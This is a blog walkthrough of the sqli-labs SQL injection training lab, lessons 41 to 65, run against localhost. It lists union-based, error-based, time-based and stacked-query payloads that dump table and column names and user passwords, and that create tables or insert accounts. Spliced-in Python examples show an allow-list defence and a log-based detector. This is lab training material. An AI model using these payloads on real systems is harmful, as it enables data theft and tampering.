sqli-labs (41-65)


    Author: lokisteven | Source: published 2019-02-26 18:50, read 36 times

    less-41

    Output is only displayed for id=1. Trying ?id=0 union select 1,1,1 echoes the injected values back successfully.

    Dump the database name:

    id=0 union select 1,1,database()

    Dump the tables:

    id=0 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='security'

    Dump the columns:

    id=0 union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'

    Dump the values:

    id=0 union select 1,1,group_concat(username,password) from users

    less-42

    Looking at the source:

    The password variable is not passed through mysql_real_escape_string() when it is POSTed.
    The username can be anything;
    the password is where we craft the injection.

    Find the column names by creating a copy of the table

    Enter in the password field:

    a';create table less42 like users#

    Once the table is created, the users table's columns turn out to be id, username, password.
    From there, just insert (or update) data:

    a';insert into users (username,password) values ('a','a')#

    less-43

    First test with the same approach as less-42,
    injection: a';create table less43 like users#

    This produces an error.
    Going by the error message, we only need to add a parenthesis on top of the less-42 payload, i.e.:

    a');create table less43 like users#

    The rest follows as in less-42.

    less-44

    Same as less-42, except there is no error output, so we can only check the database to tell whether the injection succeeded.
    Testing shows it behaves the same as less-42.

    less-45

    Combines less-44 and less-43: errors are not displayed. Test as in less-44, i.e. blind, by watching the database; the injection itself is the same as less-43.

    less-46

    Borrowed from a blog post.
    Try ?sort=1 desc or asc; if the results differ, the parameter is injectable.
    Dump the tables:

    http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%20--+

    Dump the columns:

    http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)))--+

    Dump the values:

    localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select group_concat(username,password) from users)))--+

    less-47
    Entering ?sort=1 gives normal output; entering ?sort=1' gives an error.

    The error message shows a single quote, so
    dump the tables:

    http://localhost/sqli-labs/Less-47/?sort=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))--+

    The rest follows the same pattern.
    less-48
    http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)
    http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

    less-49
    Time-based injection:
    http://localhost/sqli-labs/Less-49/index.php?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=115,0,sleep(5)))--+
    Or proceed as in less-48.
    less-50
    http://localhost/sqli-labs/Less-50/?sort=1;create%20table%20less50%20like%20users
    less-51
    http://localhost/sqli-labs/Less-51/?sort=1%27;create%20table%20less51%20like%20users--+
    less-52
    http://localhost/sqli-labs/Less-52/?sort=1;create%20table%20less52%20like%20users--+
    less-53
    ?sort=1%27;create%20table%20less53%20like%20users--+
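Less-46 through less-53 all inject through the sort parameter, which the lab concatenates straight into ORDER BY. A column name cannot be bound as a prepared-statement parameter, so the defensive fix is an allow-list. The Python below is an added example, not code from the original post or from sqli-labs: it maps the untrusted value onto a fixed set of columns and rejects everything else, with a constructed in-memory users table standing in for the lab's.

```python
import re
import sqlite3

# Allow-list: the only ORDER BY targets the application will ever emit. Keys are
# the values a client may send (including the positional "1" the lab accepts),
# values are literal column names. Schema and rows are constructed for this example.
SORT_COLUMNS = {"1": "id", "id": "id", "2": "username", "username": "username"}
SORT_RE = re.compile(r"\s*(\w+)(?:\s+(asc|desc))?\s*", re.IGNORECASE)

def order_by_unsafe(sort_param: str) -> str:
    # The pattern the lab reproduces: untrusted input pasted into the clause.
    return "ORDER BY " + sort_param

def build_order_by(sort_param: str) -> str:
    """Map an untrusted ?sort= value to a fixed clause, or raise ValueError."""
    m = SORT_RE.fullmatch(sort_param)
    if m is None:
        raise ValueError("sort must be a column name with optional asc/desc")
    column, direction = m.group(1).lower(), (m.group(2) or "asc").upper()
    if column not in SORT_COLUMNS:
        raise ValueError("sort column not in allow-list")
    return f"ORDER BY {SORT_COLUMNS[column]} {direction}"

def is_rejected(sort_param: str) -> bool:
    """True when build_order_by refuses the value (the fate of every payload above)."""
    try:
        build_order_by(sort_param)
    except ValueError:
        return True
    return False

def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows shaped like the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);"
        "INSERT INTO users (username, password) VALUES ('Dumb','Dumb'),('Angelina','I-kill-you');"
    )
    return conn

def list_users(conn: sqlite3.Connection, sort_param: str) -> list:
    """Run the listing with the allow-listed clause; no client bytes reach the SQL text."""
    sql = "SELECT id, username FROM users " + build_order_by(sort_param)
    return [row[1] for row in conn.execute(sql)]
```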
    less-54
    Dump the tables:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+
    Dump the columns:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gxdghjy72p%27--+
    Dump the values:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(secret_X79M)%20from%20gxdghjy72p--+
    less-55
    One more parenthesis: ?id=0); 14 attempts are allowed.
    less-56
    Same idea as less-54, just with one more parenthesis: ?id=0'); 14 attempts are allowed.
    less-57
    Same idea, except here id=".$id." is closed with double quotes.
    ?id=-1"union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23
    less-58
    Tried querying database(); no data comes back.
    So error-based injection is the only option left:
    ?id=0'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
    less-59
    Same as above, just without the single quote.
    ?id=0 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
    less-60
    Same as above, just with a double quote and a parenthesis: ?id=0")
    ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

    less-61
    Same as above, just with two parentheses and a single quote: ?id=0'))
    ?id=0')) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

    less-62
    union and error-based injection no longer work,
    so use time-based injection:
    ?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

    less-63
    Same as less-62, just with a single quote.
    ?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
    A correct guess returns quickly; a wrong one takes longer.

    less-64
    Same as less-63, just with two parentheses.
    ?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
    A correct guess returns quickly; a wrong one takes longer.

    less-65
    Same as above, except with ?id=1")
    ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
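On the detection side, every lesson above leaves a recognisable shape in the web server's access log: union select, extractvalue(), sleep(), a stacked create table after a semicolon, or an information_schema lookup. The Python below is an added example, not part of the original post: it URL-decodes each request target and tags it with the payload families it matches. The log lines are constructed to mirror the requests in this walkthrough.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined format) shaped like the Less-46..Less-54 requests.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2019:18:50:01 +0800] "GET /sqli-labs/Less-46/index.php?sort=1 HTTP/1.1" 200 1203
10.0.0.5 - - [26/Feb/2019:18:50:02 +0800] "GET /sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%20--+ HTTP/1.1" 200 1411
10.0.0.5 - - [26/Feb/2019:18:50:03 +0800] "GET /sqli-labs/Less-49/index.php?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=115,0,sleep(5)))--+ HTTP/1.1" 200 1203
10.0.0.5 - - [26/Feb/2019:18:50:04 +0800] "GET /sqli-labs/Less-50/?sort=1;create%20table%20less50%20like%20users HTTP/1.1" 200 1203
10.0.0.5 - - [26/Feb/2019:18:50:05 +0800] "GET /sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+ HTTP/1.1" 200 1380
10.0.0.5 - - [26/Feb/2019:18:50:06 +0800] "GET /sqli-labs/Less-41/?id=1 HTTP/1.1" 200 1203
"""

# One regex per payload family seen in the walkthrough; applied to the decoded target.
SIGNATURES = {
    "union-based":   re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "error-based":   re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time-based":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "stacked-query": re.compile(r";\s*(create|insert|update|delete|drop)\b", re.I),
    "schema-enum":   re.compile(r"\binformation_schema\.", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify_request(target: str) -> list:
    """Return the signature names matched by one request target (decoded first,
    so %20 / %27 encoding does not hide the keywords)."""
    decoded = unquote_plus(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text: str) -> list:
    """Return (line_no, path, matched_signatures) for every request that trips a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        tags = classify_request(m.group(1))
        if tags:
            hits.append((n, m.group(1).split("?")[0], tags))
    return hits

if __name__ == "__main__":
    for line_no, path, tags in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} -> {', '.join(tags)}")
```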

        Original link: https://www.haomeiwen.com/subject/fqlfeqtx.html